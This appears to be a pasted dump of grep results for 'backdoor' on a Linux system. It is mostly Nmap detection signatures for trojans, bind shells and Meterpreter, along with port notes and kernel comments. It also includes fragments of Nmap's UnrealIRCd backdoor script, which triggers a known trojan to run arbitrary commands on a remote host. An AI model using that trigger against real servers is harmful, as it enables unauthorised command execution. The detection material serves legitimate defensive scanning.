- /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse:-- @args irc-unrealircd-backdoor.command An arbitrary command to run on the remote system (note, however, that you won't see the output of your command). This will always be attempted, even if the host isn't vulnerable. The pattern <code>%IP%</code> will be replaced with the ip address of the target host.
- /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse:-- @args irc-unrealircd-backdoor.kill If set to <code>1</code> or <code>true</code>, kill the backdoored UnrealIRCd running.
- /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse:-- @args irc-unrealircd-backdoor.wait Wait time in seconds before executing the check. This is recommended to set for more reliable check (100 is good value).
- /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse:-- |_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277
- /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: -- The 'AB' sequence triggers the backdoor to run a command.
- /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: if(stdnse.get_script_args('irc-unrealircd-backdoor.command')) then
- /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: command_extra = stdnse.get_script_args('irc-unrealircd-backdoor.command')
- /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: if(stdnse.get_script_args('irc-unrealircd-backdoor.wait')) then
- /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: local waittime = stdnse.get_script_args('irc-unrealircd-backdoor.wait')
- /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: stdnse.print_debug(1, "irc-unrealircd-backdoor: waiting for %i seconds", waittime)
- /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: stdnse.print_debug(1, "irc-unrealircd-backdoor: Sending command: %s", noop_command);
- /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: stdnse.print_debug(1, "irc-unrealircd-backdoor: Couldn't connect to remote host")
- /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: stdnse.print_debug(1, "irc-unrealircd-backdoor: Receive failed after %s: %s", noop_command, response)
- /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: -- Send the backdoor command.
- /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: stdnse.print_debug(1, "irc-unrealircd-backdoor: Sending command: %s", full_command);
- /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: stdnse.print_debug(1, "irc-unrealircd-backdoor: Send failed: %s", err)
- /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: stdnse.print_debug(1, "irc-unrealircd-backdoor: Receive failed: %s", response)
- /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: return "Server closed connection, possibly due to too many reconnects. Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this message again)."
- /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: stdnse.print_debug(1, "irc-unrealircd-backdoor: Received a response to our command in " .. elapsed .. " seconds")
- /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: if(stdnse.get_script_args('irc-unrealircd-backdoor.kill')) then
- /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: stdnse.print_debug(1, "irc-unrealircd-backdoor: Attempting to kill the Trojanned UnrealIRCd server...")
- /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: stdnse.print_debug(1, "irc-unrealircd-backdoor: Looks like the Trojanned unrealircd is running!")
- /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: stdnse.print_debug(1, "irc-unrealircd-backdoor: The Trojanned version of unrealircd probably isn't running.")
- /usr/share/nmap/scripts/netbus-brute.nse:Performs brute force password auditing against the Netbus backdoor ("remote administration") service.
- /usr/share/nmap/scripts/smtp-strangeport.nse:This may indicate that crackers or script kiddies have set up a backdoor on the
- /usr/share/nmap/nmap-service-probes:match backdoor m|^220 jeem\.mail\.pv ESMTP\r\n| p/Jeem backdoor/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
- /usr/share/nmap/nmap-service-probes:match backdoor m|^\r\nUser Access Verification\r\n\r\nYour PassWord:| p/Jeem backdoor/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
- /usr/share/nmap/nmap-service-probes:match backdoor m|^ \r\n$| p/OptixPro backdoor/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
- /usr/share/nmap/nmap-service-probes:match backdoor m|^echo o [\d.]+ \d+ >s\r\necho common>> s\r\necho common>> s\r\necho bin>> s\r\necho get m220\.exe| p/JTRAM backdoor/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
- /usr/share/nmap/nmap-service-probes:match backdoor m|^220 Bot Server \(Win32\)\r\n$| p/Gaobot backdoor/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
- /usr/share/nmap/nmap-service-probes:match backdoor m|^PWD$| p/Subseven backdoor/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
- /usr/share/nmap/nmap-service-probes:match backdoor m|^\r\n\[RPL\]002\r\n$| p/Subseven backdoor/ i/**BACKDOOR**/
- /usr/share/nmap/nmap-service-probes:match backdoor m|^=+\n= +RBackdoor ([\d.]+) | p/RBackdoor/ v/$1/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
- /usr/share/nmap/nmap-service-probes:match backdoor m|^220 Windrone Server \(Win32\)\r\n$| p/NerdBot backdoor/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
- /usr/share/nmap/nmap-service-probes:match backdoor m|^Zadej heslo:$| p/Czech "zadej heslo" backdoor/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
- /usr/share/nmap/nmap-service-probes:match backdoor m|^220 Reptile welcomes you\.\.\r\n| p/Darkmoon backdoor "reptile" ftpd/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
- /usr/share/nmap/nmap-service-probes:match backdoor m|^Sifre_EDIT$| p/ProRat trojan/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
- /usr/share/nmap/nmap-service-probes:match backdoor m|^MZ\x90\0\x03\0\0\0\x04\0\0\0\xff\xff\0\0\xb8\0\0\0\0\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0fn\0\0\xd0\0\0\0\x0e\x1f\xba\x0e\0\xb4\t\xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode\.| p/Korgo worm/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
- /usr/share/nmap/nmap-service-probes:match backdoor m|^\xfa\xcb\xd9\xd9\xdd\xc5\xd8\xce\xd6| p/Theef trojan/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
- /usr/share/nmap/nmap-service-probes:match backdoor m|^220 SSL Connection Established - Loading Protocol\.\.\.\.\r\n| p/dhcpse.exe/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
- /usr/share/nmap/nmap-service-probes:match backdoor m|^A-311 Death welcome\x001| p/Haxdoor trojan/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
- /usr/share/nmap/nmap-service-probes:match backdoor m|^220 CAFEiNi [-\w_.]+ FTP server\r\n$| p/CAFEiNi trojan/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
- /usr/share/nmap/nmap-service-probes:match backdoor m=^220 (?:Stny|fuck)Ftpd 0wns j0\r?\n= p/Kibuv.b worm/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
- /usr/share/nmap/nmap-service-probes:match backdoor m|^220 [Sf.][tu.][nc.][yk.][F.][t.][p.][d.] [0.][w.][n.][s.] [j.][0.]\r?\n|i p/Generic Kibuv worm/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
- /usr/share/nmap/nmap-service-probes:match backdoor m=^(?:ba|)sh-([\d.]+)\$ = p/Bourne shell/ v/$1/ i/**BACKDOOR**/
- /usr/share/nmap/nmap-service-probes:match backdoor m|^exec .* failed : No such file or directory\n$| p/netcat -e/ i/misconfigured/
- /usr/share/nmap/nmap-service-probes:match backdoor m=220-Welcome!\r\n220-\x1b\[30m/\x1b\[31m#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4# \r\n220-\x1b\[30m\| Current Time: \x1b\[35m[^\r\n]*\r\n220-\x1b\[30m\| Current Date: \x1b\[35m[^\r\n]*\r\n220-\x1b\[30m\\\r\n= p/Windows trojan/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
- /usr/share/nmap/nmap-service-probes:match ftp m|^220-<W\x80lC0ME T0 THE \xb0GP - FXP PubSTRO\xb0 by JACK>\r\n| p/Backdoor Pubstro ftpd/ o/Windows/ cpe:/o:microsoft:windows/a
- /usr/share/nmap/nmap-service-probes:# Can't find any info on this ftpd. Backdoor? -Doug
- /usr/share/nmap/nmap-service-probes:match ftp m|^220-?\s+SSH-[\d.]+-([a-zA-Z]+)| p/FTP masquerading as $1/ i/**BACKDOOR**/
- /usr/share/nmap/nmap-service-probes:match meterpreter m|^\0.\x0b\0MZ\xe8\0\0\0\0\x5b\x52\x45\x55\x89\xe5\x81\xc3..\0\0\xff\xd3\x89\xc3Wh\x04\0\0\0P\xff\xd0h....h\x05\0\0\0P\xff\xd3\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0.\0\0\0\x0e\x1f\xba\x0e\0\xb4\t\xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode\.\r\r\n\$\0\0\0\0\0\0\0|s p/Metasploit meterpreter/ i/**BACKDOOR**/
- /usr/share/nmap/nmap-service-probes:match meterpreter m|^\x16\x03\0\0\x59\x01\0\0\x55\x03\0................................\0\0\x28\0\x39\0\x38\0\x35\0\x16\0\x13\0\x0a\0\x33\0\x32\0\x2f\0\x07\0\x05\0\x04\0\x15\0\x12\0\x09\0\x14\0\x11\0\x08\0\x06\0\x03\x01\0\0\x04\0\x23\0\0$|s p/Metasploit meterpreter metsvc/ i/**BACKDOOR**/
- /usr/share/nmap/nmap-service-probes:match netdevil m|^pass_pleaz$| p/Net-Devil backdoor/ i/**TROJAN**/ o/Windows/ cpe:/o:microsoft:windows/a
- /usr/share/nmap/nmap-service-probes:# Backdoor shell!
- /usr/share/nmap/nmap-service-probes:match shell m|^(?:ba)?sh-\d\.\d\d\w?# $| p/ROOT SHELL/ i/**BACKDOOR**/ o/Unix/
- /usr/share/nmap/nmap-service-probes:match shell m|^:: w4ck1ng-shell \(Private Build v([\w._-]+)\) bind shell backdoor :: \n\n| p/w4ck1ng-shell/ v/$1/ i/**BACKDOOR**/
- /usr/share/nmap/nmap-service-probes:match ssh m|^SSH-1\.5-FucKiT RootKit by Cyrax\r?\n| p/FucKiT RootKit sshd/ i/**BACKDOOR** protocol 1.5/ o/Linux/ cpe:/o:linux:linux_kernel/a
- /usr/share/nmap/nmap-service-probes:match ssh m|^SSH-1\.5-By-ICE_4_All \( Hackers Not Allowed! \)\r?\n| p/ICE_4_All backdoor sshd/ i/**BACKDOOR** protocol 1.5/
- /usr/share/nmap/nmap-service-probes:match winshell m=^Microsoft Windows( (?:2000|XP|NT 4\.0)|) \[Version ([\d.]+)\]\r\n\(C\) Copyright 1985-20\d\d Microsoft Corp\.\r\n\r\n= p/Microsoft Windows$1 $2 cmd.exe/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
- /usr/share/nmap/nmap-service-probes:match winshell m|^Microsoft Windows \[Version ([\d.]+)\]\r\nCopyright \(c\) 20\d\d Microsoft Corporation\. All rights reserved\.\r\n\r\n| p/Microsoft Windows $1 cmd.exe/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
- /usr/share/nmap/nmap-service-probes:match backdoor m|^Can't fork pty, bye!\n$| p/PsychoPhobia backdoor/ i/**BACKDOOR**/
- /usr/share/nmap/nmap-service-probes:match bittorrent-tracker m|^This is not a rootkit or other backdoor, it's a BitTorrent\r\nclient\. Really\.| p/Transmission bittorrent tracker/
- /usr/share/nmap/nmap-service-probes:match shell m|^bash: line 1: \r: command not found\nbash: line 2: \r: command not found\n| p/Bash shell/ i/**BACKDOOR**/
- /usr/share/nmap/nmap-service-probes:match spy-net m=^tentarnovamente\|\r\ntentarnovamente\|\r\n= p/Spy-Net or CyberGate backdoor/ i/**BACKDOOR**/
- /usr/share/nmap/nmap-service-probes:match backdoor m|^sh-2\.05b\$ | p/r0nin rootkit backdoor/
- /usr/share/nmap/nmap-service-probes:match backdoor m|^:[-\w_.]+ 451 GET :\r\n| p/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
- /usr/share/nmap/nmap-service-probes:match backdoor m|^<HTML>\n<HEAD>\n<TITLE>Directory /</TITLE>\n<BASE HREF=\"file:/\">\n</HEAD>\n<BODY>\n<H1>Directory listing of /</H1>| p/No-auth shell/ i/**BACKDOOR**/ o/Unix/
- /usr/share/nmap/nmap-service-probes:match http m|^HTTP/1\.0 200 Ok\nDate: .*\nContent-type: text/html\n\n<font size=\"-4\">\nIf you can read this, you are sitting too close to the monitor\.\n</font>\n| p/Unknown trojan/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
- /usr/share/nmap/nmap-service-probes:match smtp m|^220 ESMTP service ready\r\n250\x20ok\r\n| p/Rustock smtp backdoor/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
- /usr/share/nmap/nmap-service-probes:match mydoom m|\x04\x5b\0\0\0\0\0\0| p/MyDoom virus backdoor/ v/v012604/
- /usr/share/nmap/nmap-service-probes:match backdoor m|^666(\d+)\xff(\d+)\xff(\d+)\xff$| p/Beast Trojan/ v/version 2/ i/**BACKDOOR**; No password; New server port: $1; New client ports: $2, $3/ o/Windows/ cpe:/o:microsoft:windows/a
- /usr/share/nmap/nmap-service-probes:# Arucer backdoor
- /usr/share/nmap/nmap-service-probes:match arucer m|^\xbc\xa0\xb6$| p/Arucer backdoor/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
- /usr/share/nmap/nselib/data/psexec/backdoor.lua:---This config file is designed for adding a backdoor to the system. It has a few
- /usr/share/nmap/nmap-services:zincite-a 1034/tcp 0.001064 # Zincite.A backdoor
- /usr/share/nmap/nmap-services:java-or-OTGfileshare 1050/tcp 0.001669 # J2EE nameserver, also OTG, also called Disk/Application extender. Could also be MiniCommand backdoor OTGlicenseserv
- /usr/share/nmap/nmap-services:netbus 12345/tcp 0.000527 # NetBus backdoor trojan or Trend Micro Office Scan
- /usr/share/nmap/nmap-services:netbus 12346/tcp 0.000088 # NetBus backdoor trojan
- /usr/share/nmap/nmap-services:kuang2 17300/tcp 0.000013 # Kuang2 backdoor
- /usr/src/linux-headers-3.11.0-15/include/video/gbe.h:#define GBE_VOF_MAGICKEY 0x2000 /* Backdoor key */
- /usr/src/linux-headers-3.11.0-15/include/video/sgivw.h:#define DBE_VOF_MAGICKEY 0x2000 /* Backdoor key */
- /usr/src/linux-headers-3.11.0-15/arch/ia64/include/asm/sn/shubio.h: * (mark bit) via backdoor access to the pertinent CRB entry. This *
- /usr/src/linux-headers-3.11.0-14/include/video/gbe.h:#define GBE_VOF_MAGICKEY 0x2000 /* Backdoor key */
- /usr/src/linux-headers-3.11.0-14/include/video/sgivw.h:#define DBE_VOF_MAGICKEY 0x2000 /* Backdoor key */
- /usr/src/linux-headers-3.11.0-14/arch/ia64/include/asm/sn/shubio.h: * (mark bit) via backdoor access to the pertinent CRB entry. This *
- /usr/src/linux-headers-3.11.0-13/include/video/gbe.h:#define GBE_VOF_MAGICKEY 0x2000 /* Backdoor key */
- /usr/src/linux-headers-3.11.0-13/include/video/sgivw.h:#define DBE_VOF_MAGICKEY 0x2000 /* Backdoor key */
- /usr/src/linux-headers-3.11.0-13/arch/ia64/include/asm/sn/shubio.h: * (mark bit) via backdoor access to the pertinent CRB entry. This *
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement